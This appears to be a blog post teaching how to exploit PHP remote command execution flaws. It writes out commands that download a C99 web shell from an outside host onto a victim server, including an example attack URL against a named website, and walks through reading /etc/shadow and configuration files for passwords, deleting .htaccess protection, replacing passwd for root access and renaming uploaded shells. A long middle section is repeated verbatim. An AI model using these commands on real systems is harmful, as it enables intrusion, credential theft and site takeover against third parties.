Remote Command Execution Is A Kind Of Vulnerability In Which You Are Able To Run Commands On Victim Server.
This Is Usually A Hight Risk Vulnerability, And There Are Lots Of Methods For Using This Vulnerability, To Get The Access From The Victim Server.
When Ever, A Value Of A Variable Like "cmd" Inject To A Function That Is Enabled To Run Command, Such As System,Passthru And etc In PHP, And If You Are Able To Inject You Command In The Variable, Then RCE Happens.
There Are Lots Of Methods For Using This Vulnerability, Let's Talk About The Major Ways:
1-Download The Shell Script Code, In Victim Server, By Using Download Commands:
In Linux Os, There Are A Series Of Commands, That Enables You To Download The Special File On The Server,.
In Linux Os, There Are A Series Of Commands, That Enables You To Download The Special File On The Server,.
Let's See Example:
We Have The RCE In This Website.
Now, We Are Able To Inject "cmd" Variable.
Well, We Want To Download The File On The Server, Use On Of These Commands:
lwp-download http://[shell]
wget http://shell -O shell.php
fetch -o shell.php.php -p http://shell
lynx -source http://shell > shell.php
inks -source http://shell > shell.php
GET http://shell > shell.php
In My Example, Wget Doesn't Work, The I Tried lwp-download And Download The C99 Shell Script On The Server, Then Renamed That From C99.txt To C99.php.
http://angelptc.info/index.php?view=help&faq=1&cmd=lwp-download http://sh3llz.org/c99.txt
http://angelptc.info/index.php?view=help&faq=1&cmd=cp c99.txt c99.php
Well Done, Now We Have C99 Shell Script In http://angelptc.info/c99.php .
2-Reading Files:
2-1:Reading Shadow File: Shadow Is The Most Important File In Linux, Sometimes, The Shodow File Has The Permission Of Reading, Then , You Are Able To Read It By: cat /etc/shadow
After That, You Can Crack It And Get The Root Access.
2-2:Reading Configuration File:
Someitmes And In Some Website And Content Management Systems, There Are Good Information In Configuration File, For Example In Joomla/Mambo CMS, There Is A Section , In Which There Are The FTP Username And Password, Or Sometimes, The Website Owner, Puts The Password Of Hosting Control Panel In The Configuration File For Database Password Or etc.
And In Some Website Applications, Administrator Username And Password Store In Files, You Can Read Them, And Find Administratior Username And Password.
You Can Read Configuration File With cat Command.
2-3 :Reading Other Hosts Web Application Configuration File:
You Can Also Read Other Hosts Web Application's Configration File, In Order To Gain Information And Find Something Like FTP Information, Hosting Control Panel Information And Etc.
3:Removing Files: In Some Web Applications, Administrator Folder Is Password Protected, You Can Remove The File That Causes This Protection, And Use The Administrator Folder.
For Example, In Apache Web Server, .htaccess File Causes The Folder Protection, You Can delete The File With rm -rf Command And Use The Administrator Folder.
And Also, In Some Web Applications, The File Manager Or Upload Center Is Password Protected Again, You Can Remove This Protection With The rm -rf Command Again.
4.Updating Files:
In RCE, Editing File Is So Hard, Be Cause Linux Editors Like vi Or nano Has The Special Commands For Saving And Editing, Then You Should Update The Files,
Updating Files Is Usefull, For Example, If passwd File Has The Permission, You're Able To Read it, Delete It And Then Download The New Passwd That Edited By Yourself And Gets The Root Access To You.
Also, You Are Able To Update Configuration Files And The Files That Stores Username And Passwords, To Gain Administrator Access.
Steps Of Updating:
-Read File And Save It To Your Computer(cat command)
-Remove File(rm -rf command)
-Change The File You Have Downloaded And Upload It
-Download The File To The Server And Rename It. (download commands such as wget, get and etc)
lwp-download http://[shell]
wget http://shell -O shell.php
fetch -o shell.php.php -p http://shell
lynx -source http://shell > shell.php
inks -source http://shell > shell.php
GET http://shell > shell.php
In My Example, Wget Doesn't Work, The I Tried lwp-download And Download The C99 Shell Script On The Server, Then Renamed That From C99.txt To C99.php.
http://angelptc.info/index.php?view=help&faq=1&cmd=lwp-download http://sh3llz.org/c99.txt
http://angelptc.info/index.php?view=help&faq=1&cmd=cp c99.txt c99.php
Well Done, Now We Have C99 Shell Script In http://angelptc.info/c99.php .
2-Reading Files:
2-1:Reading Shadow File: Shadow Is The Most Important File In Linux, Sometimes, The Shodow File Has The Permission Of Reading, Then , You Are Able To Read It By: cat /etc/shadow
After That, You Can Crack It And Get The Root Access.
2-2:Reading Configuration File:
Someitmes And In Some Website And Content Management Systems, There Are Good Information In Configuration File, For Example In Joomla/Mambo CMS, There Is A Section , In Which There Are The FTP Username And Password, Or Sometimes, The Website Owner, Puts The Password Of Hosting Control Panel In The Configuration File For Database Password Or etc.
And In Some Website Applications, Administrator Username And Password Store In Files, You Can Read Them, And Find Administratior Username And Password.
You Can Read Configuration File With cat Command.
2-3 :Reading Other Hosts Web Application Configuration File:
You Can Also Read Other Hosts Web Application's Configration File, In Order To Gain Information And Find Something Like FTP Information, Hosting Control Panel Information And Etc.
3:Removing Files: In Some Web Applications, Administrator Folder Is Password Protected, You Can Remove The File That Causes This Protection, And Use The Administrator Folder.
For Example, In Apache Web Server, .htaccess File Causes The Folder Protection, You Can delete The File With rm -rf Command And Use The Administrator Folder.
And Also, In Some Web Applications, The File Manager Or Upload Center Is Password Protected Again, You Can Remove This Protection With The rm -rf Command Again.
4.Updating Files:
In RCE, Editing File Is So Hard, Be Cause Linux Editors Like vi Or nano Has The Special Commands For Saving And Editing, Then You Should Update The Files,
Updating Files Is Usefull, For Example, If passwd File Has The Permission, You're Able To Read it, Delete It And Then Download The New Passwd That Edited By Yourself And Gets The Root Access To You.
Also, You Are Able To Update Configuration Files And The Files That Stores Username And Passwords, To Gain Administrator Access.
Steps Of Updating:
-Read File And Save It To Your Computer(cat command)
-Remove File(rm -rf command)
-Change The File You Have Downloaded And Upload It
-Download The File To The Server And Rename It. (download commands such as wget, get and etc)
5-Rename Uploaded File:
Sometimes, You Can Upload Images Or Texts Into Website, But, You Can't Upload PHP File, If There Is RCE Vulnerability, You Can Change The Name Of That File.
At First, Reanme You Shell Script And Change It To .jpg, .gif, .txt And Etc...
Then, Use The mv Command To Change The File Name.
mv file.txt file.php
Or Any Other Thing Like This.
No comments:
Post a Comment